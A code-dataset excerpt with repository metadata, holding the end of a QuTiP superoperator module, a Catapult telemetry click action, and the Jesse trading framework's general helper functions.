of the steady state occupation probability as a function of an artificial phase parameter ``chi``
which multiplies the ``a \\rho a^dagger`` term of the dissipator by ``e ^ (i * chi)``. The factor ``e ^ (i * chi)``
is introduced via the generating function of the statistical moments. For examples of the technique,
see `Full counting statistics of nano-electromechanical systems <https://arxiv.org/abs/cond-mat/0410322>`_
and `Photon-mediated electron transport in hybrid circuit-QED <https://arxiv.org/abs/1303.7449>`_.
This parameter is deprecated and may be removed in QuTiP 5.
data_only : bool [False]
Return the data object instead of a Qobj
Returns
-------
D : qobj, QobjEvo
Lindblad dissipator superoperator.
"""
# To avoid circular dependencies
from .cy.qobjevo import QobjEvo
if data_only and (isinstance(a, QobjEvo) or isinstance(b, QobjEvo)):
raise ValueError("Cannot return the data object when computing the"
" collapse of a QobjEvo")
if b is None:
b = a
ad_b = a.dag() * b
if chi:
D = (
spre(a) * spost(b.dag()) * np.exp(1j * chi)
- 0.5 * spre(ad_b)
- 0.5 * spost(ad_b)
)
else:
D = spre(a) * spost(b.dag()) - 0.5 * spre(ad_b) - 0.5 * spost(ad_b)
return D.data if data_only else D
@_map_over_compound_operators
def operator_to_vector(op):
"""
Create a vector representation given a quantum operator in matrix form.
The passed object should have a ``Qobj.type`` of 'oper' or 'super'; this
function is not designed for general-purpose matrix reshaping.
Parameters
----------
op : Qobj or QobjEvo
Quantum operator in matrix form. This must have a type of 'oper' or
'super'.
Returns
-------
Qobj or QobjEvo
The same object, but re-cast into a column-stacked-vector form of type
'operator-ket'. The output is the same type as the passed object.
"""
if op.type in ['super', 'operator-ket', 'operator-bra']:
raise TypeError("Cannot convert object already "
"in super representation")
return Qobj(stack_columns(op.data),
dims=[op.dims, [1]],
type='operator-ket',
superrep="super",
copy=False)
@_map_over_compound_operators
def vector_to_operator(op):
"""
Create a matrix representation given a quantum operator in vector form.
The passed object should have a ``Qobj.type`` of 'operator-ket'; this
function is not designed for general-purpose matrix reshaping.
Parameters
----------
op : Qobj or QobjEvo
Quantum operator in column-stacked-vector form. This must have a type
of 'operator-ket'.
Returns
-------
Qobj or QobjEvo
The same object, but re-cast into "standard" operator form. The output
is the same type as the passed object.
"""
if not op.isoperket:
raise TypeError("only defined for operator-kets")
if op.superrep != "super":
raise TypeError("only defined for operator-kets in super format")
dims = op.dims[0]
return Qobj(unstack_columns(op.data, (np.prod(dims[0]), np.prod(dims[1]))),
dims=dims,
copy=False)
def stack_columns(matrix):
"""
Stack the columns in a data-layer type, useful for converting an operator
into a superoperator representation.
"""
if not isinstance(matrix, (_data.Data, np.ndarray)):
raise TypeError(
"input " + repr(type(matrix)) + " is not data-layer type"
)
if isinstance(matrix, np.ndarray):
return matrix.ravel('F')[:, None]
return _data.column_stack(matrix)
def unstack_columns(vector, shape=None):
"""
Unstack the columns in a data-layer type back into a 2D shape, useful for
converting an operator in vector form back into a regular operator. If
`shape` is not passed, the output operator will be assumed to be square.
"""
if not isinstance(vector, (_data.Data, np.ndarray)):
raise TypeError(
"input " + repr(type(vector)) + " is not data-layer type"
)
if (
(isinstance(vector, _data.Data) and vector.shape[1] != 1)
or (isinstance(vector, np.ndarray)
and ((vector.ndim == 2 and vector.shape[1] != 1)
or vector.ndim > 2))
):
raise TypeError("input is not a single column")
if shape is None:
n = int(np.sqrt(vector.shape[0]))
if n * n != vector.shape[0]:
raise ValueError(
"input cannot be made square, but no specific shape given"
)
shape = (n, n)
if isinstance(vector, np.ndarray):
return vector.reshape(shape, order='F')
return _data.column_unstack(vector, shape[0])
def unstacked_index(size, index):
"""
Convert an index into a column-stacked square operator with `size` rows and
columns, into a pair of indices into the unstacked operator.
"""
return index % size, index // size
def stacked_index(size, row, col):
"""
Convert a pair of indices into a square operator of `size` into a single
index into the column-stacked version of the operator.
"""
return row + size*col
@_map_over_compound_operators
def spost(A):
"""
Superoperator formed from post-multiplication by operator A
Parameters
----------
A : Qobj or QobjEvo
Quantum operator for post multiplication.
Returns
-------
super : Qobj or QobjEvo
Superoperator formed from input qauntum object.
"""
if not A.isoper:
raise TypeError('Input is not a quantum operator')
Id = _data.identity(A.shape[0], dtype=type(A.data))
data = _data.kron_transpose(A.data, _data.identity_like(A.data))
return Qobj(data,
dims=[A.dims, A.dims],
type='super',
superrep='super',
isherm=A._isherm,
copy=False)
@_map_over_compound_operators
def spre(A):
"""Superoperator formed from pre-multiplication by operator A.
Parameters
----------
A : Qobj or QobjEvo
Quantum operator for pre-multiplication.
Returns
-------
super :Qobj or QobjEvo
Superoperator formed from input quantum object.
"""
if not A.isoper:
raise TypeError('Input is not a quantum operator')
data = _data.kron(_data.identity_like(A.data), A.data)
return Qobj(data,
dims=[A.dims, A.dims],
type='super',
superrep='super',
isherm=A._isherm,
copy=False)
def _drop_projected_dims(dims):
"""
Eliminate subsystems that has been collapsed to only one state due to
a projection.
"""
return [d for d in dims if d != 1]
def sprepost(A, B):
"""
Superoperator formed from pre-multiplication by A and post-multiplication
by B.
Parameters
----------
A : Qobj or QobjEvo
Quantum operator for pre-multiplication.
B : Qobj or QobjEvo
Quantum operator for post-multiplication.
Returns
-------
super : Qobj or QobjEvo
Superoperator formed from input quantum objects.
"""
# To avoid circular dependencies
from .cy.qobjevo import QobjEvo
if (isinstance(A, QobjEvo) or isinstance(B, QobjEvo)):
return spre(A) * spost(B)
dims = [[_drop_projected_dims(A.dims[0]),
_drop_projected_dims(B.dims[1])],
[_drop_projected_dims(A.dims[1]),
_drop_projected_dims(B.dims[0])]]
return Qobj(_data.kron_transpose(B.data, A.data),
dims=dims,
type='super',
superrep='super',
isherm=A._isherm and B._isherm,
copy=False)
def reshuffle(q_oper):
"""
Column-reshuffles a ``type="super"`` Qobj.
"""
if q_oper.type not in ('super', 'operator-ket'):
raise TypeError("Reshuffling is only supported on type='super' "
"or type='operator-ket'.")
# How many indices are there, and how many subsystems can we decompose
# each index into?
n_indices = len(q_oper.dims[0])
n_subsystems = len(q_oper.dims[0][0])
# Generate a list of lists (lol) that represents the permutation order we
# need. It's easiest to do so if we make an array, then turn it into a lol
# by using map(list, ...). That array is generated by using reshape and
# transpose to turn an array like [a, b, a, b, ..., a, b] into one like
# [a, a, ..., a, b, b, ..., b].
perm_idxs = map(list,
np.arange(n_subsystems * n_indices)[
np.arange(n_subsystems * n_indices).reshape(
(n_indices, n_subsystems)).T.flatten()
].reshape((n_subsystems, n_indices))
)
return q_oper.permute(list(perm_idxs))
|
3f23fafc812d745f5548aad6195b20e15230e3d4
|
3a6a211ea0d32405497fbd6486c490bb147e25f9
|
/telemetry/telemetry/internal/actions/javascript_click.py
|
6fe69707cc515847ed652d8da8bcb9bba618b6d5
|
[
"BSD-3-Clause"
] |
permissive
|
catapult-project/catapult
|
e2cbdd5eb89f3b1492fc8752494e62ea1df4bae0
|
53102de187a48ac2cfc241fef54dcbc29c453a8e
|
refs/heads/main
| 2021-05-25T07:37:22.832505
| 2021-05-24T08:01:49
| 2021-05-25T06:07:38
| 33,947,548
| 2,032
| 742
|
BSD-3-Clause
| 2022-08-26T16:01:18
| 2015-04-14T17:49:05
|
HTML
|
UTF-8
|
Python
| false
| false
| 710
|
py
|
javascript_click.py
|
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from __future__ import absolute_import
from telemetry.internal.actions import page_action
class ClickElementAction(page_action.ElementPageAction):
def RunAction(self, tab):
code = '''
function(element, errorMsg) {
if (!element) {
throw Error('Cannot find element: ' + errorMsg);
}
element.click();
}'''
# Click handler that plays media or requests fullscreen may not take
# effects without user_gesture set to True.
self.EvaluateCallback(tab, code, user_gesture=True)
|
cea1d4ff649fd4a0dbadde515b37d2e5c839e921
|
b43e0384ec4bfacec2571a2bb41ce563267db449
|
/jesse/helpers.py
|
eb5fc27b42024adcd6ece80ea7d05bf1027af2f7
|
[
"MIT"
] |
permissive
|
jesse-ai/jesse
|
55b73448b767492a20f8bc56c28306a1a24f8599
|
fadb03b5fcc06f0655c6a5d877435fb872a97c5e
|
refs/heads/master
| 2023-08-24T15:28:52.875208
| 2023-08-24T13:53:31
| 2023-08-24T13:53:31
| 156,847,937
| 5,259
| 722
|
MIT
| 2023-09-10T13:51:26
| 2018-11-09T10:38:44
|
Python
|
UTF-8
|
Python
| false
| false
| 28,324
|
py
|
helpers.py
|
import hashlib
import math
import os
import random
import string
import sys
import uuid
from typing import List, Tuple, Union, Any, Optional
from pprint import pprint
import arrow
import click
import numpy
import numpy as np
CACHED_CONFIG = dict()
def app_currency() -> str:
from jesse.routes import router
return quote_asset(router.routes[0].symbol)
def app_mode() -> str:
from jesse.config import config
return config['app']['trading_mode']
def arrow_to_timestamp(arrow_time: arrow.arrow.Arrow) -> int:
return arrow_time.int_timestamp * 1000
def base_asset(symbol: str) -> str:
return symbol.split('-')[0]
def binary_search(arr: list, item) -> int:
"""
performs a simple binary search on a sorted list
:param arr: list
:param item:
:return: int
"""
from bisect import bisect_left
i = bisect_left(arr, item)
if i != len(arr) and arr[i] == item:
return i
else:
return -1
def class_iter(Class):
return (value for variable, value in vars(Class).items() if
not callable(getattr(Class, variable)) and not variable.startswith("__"))
def clean_orderbook_list(arr) -> List[List[float]]:
return [[float(i[0]), float(i[1])] for i in arr]
def color(msg_text: str, msg_color: str) -> str:
if not msg_text:
return ''
if msg_color == 'black':
return click.style(msg_text, fg='black')
if msg_color == 'red':
return click.style(msg_text, fg='red')
if msg_color == 'green':
return click.style(msg_text, fg='green')
if msg_color == 'yellow':
return click.style(msg_text, fg='yellow')
if msg_color == 'blue':
return click.style(msg_text, fg='blue')
if msg_color == 'magenta':
return click.style(msg_text, fg='magenta')
if msg_color == 'cyan':
return click.style(msg_text, fg='cyan')
if msg_color in {'white', 'gray'}:
return click.style(msg_text, fg='white')
raise ValueError('unsupported color')
def convert_number(old_max: float, old_min: float, new_max: float, new_min: float, old_value: float) -> float:
"""
convert a number from one range (ex 40-119) to another
range (ex 0-30) while keeping the ratio.
"""
# validation
if old_value > old_max or old_value < old_min:
raise ValueError(f'old_value:{old_value} must be within the range. {old_min}-{old_max}')
old_range = (old_max - old_min)
new_range = (new_max - new_min)
return (((old_value - old_min) * new_range) / old_range) + new_min
def dashless_symbol(symbol: str) -> str:
return symbol.replace("-", "")
def dashy_symbol(symbol: str) -> str:
# if already has '-' in symbol, return symbol
if '-' in symbol:
return symbol
from jesse.config import config
for s in config['app']['considering_symbols']:
compare_symbol = dashless_symbol(s)
if compare_symbol == symbol:
return s
if len(symbol) > 7 and symbol.endswith('SUSDT'):
# ex: SETHSUSDT => SETH-SUSDT
return symbol[:-5] + '-' + symbol[-5:]
return f"{symbol[0:3]}-{symbol[3:]}"
def date_diff_in_days(date1: arrow.arrow.Arrow, date2: arrow.arrow.Arrow) -> int:
if type(date1) is not arrow.arrow.Arrow or type(
date2) is not arrow.arrow.Arrow:
raise TypeError('dates must be Arrow instances')
dif = date2 - date1
return abs(dif.days)
def date_to_timestamp(date: str) -> int:
"""
converts date string into timestamp. "2015-08-01" => 1438387200000
:param date: str
:return: int
"""
return arrow_to_timestamp(arrow.get(date, 'YYYY-MM-DD'))
def dna_to_hp(strategy_hp, dna: str):
hp = {}
for gene, h in zip(dna, strategy_hp):
if h['type'] is int:
decoded_gene = int(
round(
convert_number(119, 40, h['max'], h['min'], ord(gene))
)
)
elif h['type'] is float:
decoded_gene = convert_number(119, 40, h['max'], h['min'], ord(gene))
else:
raise TypeError('Only int and float types are implemented')
hp[h['name']] = decoded_gene
return hp
def dump_exception() -> None:
"""
a useful debugging helper
"""
import traceback
print(traceback.format_exc())
terminate_app()
def estimate_average_price(order_qty: float, order_price: float, current_qty: float,
current_entry_price: float) -> float:
"""Estimates the new entry price for the position.
This is used after having a new order and updating the currently holding position.
Arguments:
order_qty {float} -- qty of the new order
order_price {float} -- price of the new order
current_qty {float} -- current(pre-calculation) qty
current_entry_price {float} -- current(pre-calculation) entry price
Returns:
float -- the new/averaged entry price
"""
return (abs(order_qty) * order_price + abs(current_qty) *
current_entry_price) / (abs(order_qty) + abs(current_qty))
def estimate_PNL(qty: float, entry_price: float, exit_price: float, trade_type: str, trading_fee: float = 0) -> float:
qty = abs(qty)
profit = qty * (exit_price - entry_price)
if trade_type == 'short':
profit *= -1
fee = trading_fee * qty * (entry_price + exit_price)
return profit - fee
def estimate_PNL_percentage(qty: float, entry_price: float, exit_price: float, trade_type: str) -> float:
qty = abs(qty)
profit = qty * (exit_price - entry_price)
if trade_type == 'short':
profit *= -1
return (profit / (qty * entry_price)) * 100
def file_exists(path: str) -> bool:
return os.path.isfile(path)
def clear_file(path: str) -> None:
with open(path, 'w') as f:
f.write('')
def make_directory(path: str) -> None:
if not os.path.exists(path):
os.makedirs(path)
def floor_with_precision(num: float, precision: int = 0) -> float:
temp = 10 ** precision
return math.floor(num * temp) / temp
def format_currency(num: float) -> str:
return f'{num:,}'
def generate_unique_id() -> str:
return str(uuid.uuid4())
def get_arrow(timestamp: int) -> arrow.arrow.Arrow:
return timestamp_to_arrow(timestamp)
def get_candle_source(candles: np.ndarray, source_type: str = "close") -> np.ndarray:
"""
Returns the candles corresponding the selected type.
:param candles: np.ndarray
:param source_type: string
:return: np.ndarray
"""
if source_type == "close":
return candles[:, 2]
elif source_type == "high":
return candles[:, 3]
elif source_type == "low":
return candles[:, 4]
elif source_type == "open":
return candles[:, 1]
elif source_type == "volume":
return candles[:, 5]
elif source_type == "hl2":
return (candles[:, 3] + candles[:, 4]) / 2
elif source_type == "hlc3":
return (candles[:, 3] + candles[:, 4] + candles[:, 2]) / 3
elif source_type == "ohlc4":
return (candles[:, 1] + candles[:, 3] + candles[:, 4] + candles[:, 2]) / 4
else:
raise ValueError('type string not recognised')
def get_config(keys: str, default: Any = None) -> Any:
"""
Gets keys as a single string separated with "." and returns value.
Also accepts a default value so that the app would work even if
the required config value is missing from config.py file.
Example: get_config('env.logging.order_submission', True)
:param keys: str
:param default: None
:return:
"""
if not str:
raise ValueError('keys string cannot be empty')
if is_unit_testing() or keys not in CACHED_CONFIG:
if os.environ.get(keys.upper().replace(".", "_").replace(" ", "_")) is not None:
CACHED_CONFIG[keys] = os.environ.get(keys.upper().replace(".", "_").replace(" ", "_"))
else:
from functools import reduce
from jesse.config import config
CACHED_CONFIG[keys] = reduce(lambda d, k: d.get(k, default) if isinstance(d, dict) else default,
keys.split("."), config)
return CACHED_CONFIG[keys]
def get_store():
from jesse.store import store
return store
def get_strategy_class(strategy_name: str):
from pydoc import locate
if not is_unit_testing():
return locate(f'strategies.{strategy_name}.{strategy_name}')
path = sys.path[0]
# live plugin
if path.endswith('jesse-live'):
strategy_dir = f'tests.strategies.{strategy_name}.{strategy_name}'
# main framework
else:
strategy_dir = f'jesse.strategies.{strategy_name}.{strategy_name}'
return locate(strategy_dir)
def insecure_hash(msg: str) -> str:
return hashlib.md5(msg.encode()).hexdigest()
def insert_list(index: int, item, arr: list) -> list:
"""
helper to insert an item in a Python List without removing the item
"""
if index == -1:
return arr + [item]
return arr[:index] + [item] + arr[index:]
def is_backtesting() -> bool:
from jesse.config import config
return config['app']['trading_mode'] == 'backtest'
def is_collecting_data() -> bool:
from jesse.config import config
return config['app']['trading_mode'] == 'collect'
def is_debuggable(debug_item) -> bool:
from jesse.config import config
return is_debugging() and config['env']['logging'][debug_item]
def is_debugging() -> bool:
from jesse.config import config
return config['app']['debug_mode']
def is_importing_candles() -> bool:
from jesse.config import config
return config['app']['trading_mode'] == 'candles'
def is_live() -> bool:
return is_livetrading() or is_paper_trading()
def is_livetrading() -> bool:
from jesse.config import config
return config['app']['trading_mode'] == 'livetrade'
def is_optimizing() -> bool:
from jesse.config import config
return config['app']['trading_mode'] == 'optimize'
def is_paper_trading() -> bool:
from jesse.config import config
return config['app']['trading_mode'] == 'papertrade'
def is_unit_testing() -> bool:
from jesse.config import config
# config['app']['is_unit_testing'] is only set in the live plugin unit tests
return "pytest" in sys.modules or config['app']['is_unit_testing']
def is_valid_uuid(uuid_to_test: str, version: int = 4) -> bool:
try:
uuid_obj = uuid.UUID(uuid_to_test, version=version)
except ValueError:
return False
return str(uuid_obj) == uuid_to_test
def key(exchange: str, symbol: str, timeframe: str = None):
if timeframe is None:
return f'{exchange}-{symbol}'
return f'{exchange}-{symbol}-{timeframe}'
def max_timeframe(timeframes_list: list) -> str:
from jesse.enums import timeframes
if timeframes.DAY_1 in timeframes_list:
return timeframes.DAY_1
if timeframes.HOUR_12 in timeframes_list:
return timeframes.HOUR_12
if timeframes.HOUR_8 in timeframes_list:
return timeframes.HOUR_8
if timeframes.HOUR_6 in timeframes_list:
return timeframes.HOUR_6
if timeframes.HOUR_4 in timeframes_list:
return timeframes.HOUR_4
if timeframes.HOUR_3 in timeframes_list:
return timeframes.HOUR_3
if timeframes.HOUR_2 in timeframes_list:
return timeframes.HOUR_2
if timeframes.HOUR_1 in timeframes_list:
return timeframes.HOUR_1
if timeframes.MINUTE_45 in timeframes_list:
return timeframes.MINUTE_45
if timeframes.MINUTE_30 in timeframes_list:
return timeframes.MINUTE_30
if timeframes.MINUTE_15 in timeframes_list:
return timeframes.MINUTE_15
if timeframes.MINUTE_5 in timeframes_list:
return timeframes.MINUTE_5
if timeframes.MINUTE_3 in timeframes_list:
return timeframes.MINUTE_3
return timeframes.MINUTE_1
def normalize(x: float, x_min: float, x_max: float) -> float:
"""
Rescaling data to have values between 0 and 1
"""
return (x - x_min) / (x_max - x_min)
def now(force_fresh=False) -> int:
"""
Always returns the current time in milliseconds but rounds time in matter of seconds
"""
return now_to_timestamp(force_fresh)
def now_to_timestamp(force_fresh=False) -> int:
if not force_fresh and (not (is_live() or is_collecting_data() or is_importing_candles())):
from jesse.store import store
return store.app.time
return arrow.utcnow().int_timestamp * 1000
def current_1m_candle_timestamp():
return arrow.utcnow().floor('minute').int_timestamp * 1000
def np_ffill(arr: np.ndarray, axis: int = 0) -> np.ndarray:
idx_shape = tuple([slice(None)] + [np.newaxis] * (len(arr.shape) - axis - 1))
idx = np.where(~np.isnan(arr), np.arange(arr.shape[axis])[idx_shape], 0)
np.maximum.accumulate(idx, axis=axis, out=idx)
slc = [
np.arange(k)[
tuple(
slice(None) if dim == i else np.newaxis
for dim in range(len(arr.shape))
)
]
for i, k in enumerate(arr.shape)
]
slc[axis] = idx
return arr[tuple(slc)]
def np_shift(arr: np.ndarray, num: int, fill_value=0) -> np.ndarray:
result = np.empty_like(arr)
if num > 0:
result[:num] = fill_value
result[num:] = arr[:-num]
elif num < 0:
result[num:] = fill_value
result[:num] = arr[-num:]
else:
result[:] = arr
return result
def opposite_side(s: str) -> str:
from jesse.enums import sides
if s == sides.BUY:
return sides.SELL
elif s == sides.SELL:
return sides.BUY
else:
raise ValueError(f'{s} is not a valid input for side')
def opposite_type(t: str) -> str:
from jesse.enums import trade_types
if t == trade_types.LONG:
return trade_types.SHORT
if t == trade_types.SHORT:
return trade_types.LONG
raise ValueError('unsupported type')
def orderbook_insertion_index_search(arr, target: int, ascending: bool = True) -> Tuple[bool, int]:
target = target[0]
lower = 0
upper = len(arr)
while lower < upper:
x = lower + (upper - lower) // 2
val = arr[x][0]
if ascending:
if target == val:
return True, x
elif target > val:
if lower == x:
return False, lower + 1
lower = x
elif target < val:
if lower == x:
return False, lower
upper = x
elif target == val:
return True, x
elif target < val:
if lower == x:
return False, lower + 1
lower = x
elif target > val:
if lower == x:
return False, lower
upper = x
def orderbook_trim_price(p: float, ascending: bool, unit: float) -> float:
if ascending:
trimmed = np.ceil(p / unit) * unit
if math.log10(unit) < 0:
trimmed = round(trimmed, abs(int(math.log10(unit))))
return p if trimmed == p + unit else trimmed
trimmed = np.ceil(p / unit) * unit - unit
if math.log10(unit) < 0:
trimmed = round(trimmed, abs(int(math.log10(unit))))
return p if trimmed == p - unit else trimmed
def prepare_qty(qty: float, side: str) -> float:
if side.lower() in ('sell', 'short'):
return -abs(qty)
elif side.lower() in ('buy', 'long'):
return abs(qty)
elif side.lower() == 'close':
return 0.0
else:
raise ValueError(f'{side} is not a valid input')
def python_version() -> tuple:
return sys.version_info[:2]
def quote_asset(symbol: str) -> str:
try:
return symbol.split('-')[1]
except IndexError:
from jesse.exceptions import InvalidRoutes
raise InvalidRoutes(f"The symbol format is incorrect. Correct example: 'BTC-USDT'. Yours is '{symbol}'")
def random_str(num_characters: int = 8) -> str:
return ''.join(random.choice(string.ascii_letters) for _ in range(num_characters))
def readable_duration(seconds: int, granularity: int = 2) -> str:
intervals = (
('weeks', 604800), # 60 * 60 * 24 * 7
('days', 86400), # 60 * 60 * 24
('hours', 3600), # 60 * 60
('minutes', 60),
('seconds', 1),
)
result = []
seconds = int(seconds)
for name, count in intervals:
value = seconds // count
if value:
seconds -= value * count
if value == 1:
name = name.rstrip('s')
result.append(f"{value} {name}")
return ', '.join(result[:granularity])
def relative_to_absolute(path: str) -> str:
return os.path.abspath(path)
def round_or_none(x: Union[float, None], digits: int = 0) -> Optional[float]:
"""
Rounds a number to a certain number of digits or returns None if the number is None
"""
if x is None:
return None
return round(x, digits)
def round_price_for_live_mode(price, precision: int) -> Union[float, np.ndarray]:
"""
Rounds price(s) based on exchange requirements
:param price: float
:param precision: int
:return: float | nd.array
"""
return np.round(price, precision)
def round_qty_for_live_mode(roundable_qty: float, precision: int) -> Union[float, np.ndarray]:
"""
Rounds qty(s) based on exchange requirements
:param roundable_qty: float | nd.array
:param precision: int
:return: float | nd.array
"""
input_type = type(roundable_qty)
# if roundable_qty is a scalar, convert to nd.array
if not isinstance(roundable_qty, np.ndarray):
roundable_qty = np.array([roundable_qty])
# for qty rounding down is important to prevent InsufficenMargin
rounded = round_decimals_down(roundable_qty, precision)
for index, q in enumerate(rounded):
# if the rounded value is 0, make it the minimum possible value
if q == 0.0:
# if the precision is bigger or equal 0, (for numbers like 2, 0.2, 0.02)
if precision >= 0:
rounded[index] = 1 / 10 ** precision
else: # for numbers like 20, 200, 2000
raise ValueError('qty is too small')
if input_type in [float, np.float64]:
return float(rounded[0])
return rounded
def round_decimals_down(number: Union[np.ndarray, float], decimals: int = 2) -> float:
"""
Returns a value rounded down to a specific number of decimal places.
"""
if not isinstance(decimals, int):
raise TypeError("decimal places must be an integer")
elif decimals == 0:
return np.floor(number)
elif decimals > 0:
factor = 10 ** decimals
return np.floor(number * factor) / factor
elif decimals < 0:
# for example, for decimals = -2, we want to round down to the nearest 100 if the number is 1234, we want to return 1200:
factor = 10 ** (decimals * -1)
return np.floor(number / factor) * factor
def same_length(bigger: np.ndarray, shorter: np.ndarray) -> np.ndarray:
return np.concatenate((np.full((bigger.shape[0] - shorter.shape[0]), np.nan), shorter))
def secure_hash(msg: str) -> str:
return hashlib.sha256(msg.encode()).hexdigest()
def should_execute_silently() -> bool:
return is_optimizing() or is_unit_testing()
def side_to_type(s: str) -> str:
from jesse.enums import trade_types, sides
# make sure string is lowercase
s = s.lower()
if s == sides.BUY:
return trade_types.LONG
if s == sides.SELL:
return trade_types.SHORT
raise ValueError
def string_after_character(s: str, character: str) -> str:
try:
return s.split(character, 1)[1]
except IndexError:
return None
def slice_candles(candles: np.ndarray, sequential: bool) -> np.ndarray:
warmup_candles_num = get_config('env.data.warmup_candles_num', 240)
if not sequential and candles.shape[0] > warmup_candles_num:
candles = candles[-warmup_candles_num:]
return candles
def style(msg_text: str, msg_style: str) -> str:
if msg_style is None:
return msg_text
if msg_style.lower() in ['bold', 'b']:
return click.style(msg_text, bold=True)
if msg_style.lower() in ['underline', 'u']:
return click.style(msg_text, underline=True)
raise ValueError('unsupported style')
def terminate_app() -> None:
# close the database
from jesse.services.db import database
database.close_connection()
# disconnect python from the OS
os._exit(1)
def error(msg: str, force_print: bool = False) -> None:
# send notifications if it's a live session
if is_live():
from jesse.services import logger
logger.error(msg)
if force_print:
_print_error(msg)
else:
_print_error(msg)
def _print_error(msg: str) -> None:
print('\n')
print(color('========== critical error =========='.upper(), 'red'))
print(color(msg, 'red'))
def timeframe_to_one_minutes(timeframe: str) -> int:
from jesse.enums import timeframes
from jesse.exceptions import InvalidTimeframe
dic = {
timeframes.MINUTE_1: 1,
timeframes.MINUTE_3: 3,
timeframes.MINUTE_5: 5,
timeframes.MINUTE_15: 15,
timeframes.MINUTE_30: 30,
timeframes.MINUTE_45: 45,
timeframes.HOUR_1: 60,
timeframes.HOUR_2: 60 * 2,
timeframes.HOUR_3: 60 * 3,
timeframes.HOUR_4: 60 * 4,
timeframes.HOUR_6: 60 * 6,
timeframes.HOUR_8: 60 * 8,
timeframes.HOUR_12: 60 * 12,
timeframes.DAY_1: 60 * 24,
timeframes.DAY_3: 60 * 24 * 3,
timeframes.WEEK_1: 60 * 24 * 7,
timeframes.MONTH_1: 60 * 24 * 30,
}
try:
return dic[timeframe]
except KeyError:
all_timeframes = [timeframe for timeframe in class_iter(timeframes)]
raise InvalidTimeframe(
f'Timeframe "{timeframe}" is invalid. Supported timeframes are {", ".join(all_timeframes)}.')
def timestamp_to_arrow(timestamp: int) -> arrow.arrow.Arrow:
return arrow.get(timestamp / 1000)
def timestamp_to_date(timestamp: int) -> str:
return str(arrow.get(timestamp / 1000))[:10]
def timestamp_to_time(timestamp: int) -> str:
return str(arrow.get(timestamp / 1000))
def timestamp_to_iso8601(timestamp: int) -> str:
# example: 1609804800000 => '2021-01-05T00:00:00.000Z'
return arrow.get(timestamp / 1000).isoformat()
def iso8601_to_timestamp(iso8601: str) -> int:
# example: '2021-01-05T00:00:00.000Z' -> 1609740800000
return int(arrow.get(iso8601, 'YYYY-MM-DDTHH:mm:ss.SSSZ').datetime.timestamp()) * 1000
def today_to_timestamp() -> int:
"""
returns today's (beginning) timestamp
:return: int
"""
return arrow.utcnow().floor('day').int_timestamp * 1000
def type_to_side(t: str) -> str:
from jesse.enums import trade_types, sides
if t == trade_types.LONG:
return sides.BUY
if t == trade_types.SHORT:
return sides.SELL
raise ValueError(f'unsupported type: "{t}". Only "long" and "short" are supported.')
def unique_list(arr) -> list:
"""
returns a unique version of the list while keeping its order
:param arr: list | tuple
:return: list
"""
seen = set()
seen_add = seen.add
return [x for x in arr if not (x in seen or seen_add(x))]
def closing_side(position_type: str) -> str:
if position_type.lower() == 'long':
return 'sell'
elif position_type.lower() == 'short':
return 'buy'
else:
raise ValueError(f'Value entered for position_type ({position_type}) is not valid')
def merge_dicts(d1: dict, d2: dict) -> dict:
"""
Merges nested dictionaries
:param d1: dict
:param d2: dict
:return: dict
"""
def inner(dict1, dict2):
for k in set(dict1.keys()).union(dict2.keys()):
if k in dict1 and k in dict2:
if isinstance(dict1[k], dict) and isinstance(dict2[k], dict):
yield k, dict(merge_dicts(dict1[k], dict2[k]))
else:
yield k, dict2[k]
elif k in dict1:
yield k, dict1[k]
else:
yield k, dict2[k]
return dict(inner(d1, d2))
def computer_name():
import platform
return platform.node()
def validate_response(response):
if response.status_code != 200:
err_msg = f"[{response.status_code}]: {response.json()['message']}\nPlease contact us at support@jesse.trade if this is unexpected."
if response.status_code not in [401, 403]:
raise ConnectionError(err_msg)
error(err_msg, force_print=True)
terminate_app()
def get_session_id():
from jesse.store import store
if store.app.session_id == '':
store.app.session_id = generate_unique_id()
return store.app.session_id
def get_pid():
return os.getpid()
def is_jesse_project():
ls = os.listdir('.')
return 'strategies' in ls and 'storage' in ls
def dd(item):
"""
Dump and Die but pretty: used for debugging when developing Jesse
"""
dump(item)
terminate_app()
def dump(*item):
"""
Dump object in pretty format: used for debugging when developing Jesse
"""
if len(item) == 1:
item = item[0]
print(
color('\n========= Debugging Value =========='.upper(), 'yellow')
)
pprint(item)
print(
color('====================================\n', 'yellow')
)
def float_or_none(item):
"""
Return the float of the value if it's not None
"""
if item is None or item == '':
return None
else:
return float(item)
def str_or_none(item, encoding='utf-8'):
"""
Return the str of the value if it's not None
"""
if item is None:
return None
else:
# return item if it's str, if not, decode it using encoding
if isinstance(item, str):
return item
if type(item) == numpy.float64:
return str(item)
try:
return str(item, encoding)
except TypeError:
return str(item)
def cpu_cores_count():
from multiprocessing import cpu_count
return cpu_count()
# a function that converts name to env_name. Example: 'Testnet Binance Futures' into 'TESTNET_BINANCE_FUTURES'
def convert_to_env_name(name: str) -> str:
return name.replace(' ', '_').upper()
def is_notebook():
try:
shell = get_ipython().__class__.__name__
# Jupyter notebook or qtconsole
if shell == 'ZMQInteractiveShell':
return True
elif shell == 'TerminalInteractiveShell':
# Terminal running IPython
return False
else:
# Other type (?)
return False
except NameError:
# Probably standard Python interpreter
return False
def get_os() -> str:
import platform
if platform.system() == 'Darwin':
return 'mac'
elif platform.system() == 'Linux':
return 'linux'
elif platform.system() == 'Windows':
return 'windows'
else:
raise NotImplementedError(f'Unsupported OS: "{platform.system()}"')
# a function that returns boolean whether or not the code is being executed inside a docker container
def is_docker() -> bool:
import os
return os.path.exists('/.dockerenv')
def clear_output():
if is_notebook():
from IPython.display import clear_output
clear_output(wait=True)
else:
click.clear()
def get_class_name(cls):
# if it's a string, return it
if isinstance(cls, str):
return cls
# else, return the class name
return cls.__name__
def next_candle_timestamp(candle: np.ndarray, timeframe: str) -> int:
return candle[0] + timeframe_to_one_minutes(timeframe) * 60_000
def get_candle_start_timestamp_based_on_timeframe(timeframe: str, num_candles_to_fetch: int) -> int:
one_min_count = timeframe_to_one_minutes(timeframe)
finish_date = now(force_fresh=True)
return finish_date - (num_candles_to_fetch * one_min_count * 60_000)
|
ea884c0f7e65b9d06f63cbbed69571c47abf862f
|
6dfc23ef65e5943712340ef2b4b648cc25ea1fad
|
/2022/01/03/Creating One-To-Many Relationships in Flask-SQLAlchemy/one_to_many_example/app.py
|
35befc58a45a94708fb1c0abda0ff9de76e704ad
|
[
"Unlicense"
] |
permissive
|
PrettyPrinted/youtube_video_code
|
6d265c910de18d780cdb99f7ea11b8b963929dc2
|
